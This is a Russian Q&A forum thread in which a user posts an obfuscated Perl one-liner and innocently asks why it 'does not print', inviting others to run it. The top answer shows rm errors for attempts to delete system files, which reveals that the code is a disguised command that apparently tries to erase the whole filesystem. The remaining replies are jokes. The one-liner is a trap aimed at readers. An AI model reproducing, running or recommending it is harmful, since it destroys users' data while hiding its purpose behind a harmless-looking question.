Программа не печатает, почему?

Антоша Профи (768), закрыт 5 лет назад
cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

-не печатает, у вас печатает?
Лучший ответ
Иван Сигаев Искусственный Интеллект (150114) 5 лет назад
При правильной настройке прав доступа даже не выполняет удаление

rm: невозможно сменить каталог с `/' на `lost+found': Permission denied
rm: невозможно удалить `//var/lib/rpm/Requirename': Permission denied
rm: невозможно удалить `//var/lib/rpm/Packages': Permission denied
rm: невозможно удалить `//var/lib/rpm/Pubkeys': Permission denied
rm: невозможно удалить `//var/lib/rpm/Basenames': Permission denied
rm: невозможно удалить `//var/lib/rpm/Name': Permission denied
Остальные ответы
Name Name Гуру (3431) 5 лет назад
Не знаю, как Яндекс, а Гугл использует программу SketchUp для этого
coder Мыслитель (5331) 5 лет назад
ахренеть, вот это синтаксис)) по-моему в exe открытом в Notepad++ разобраться легче))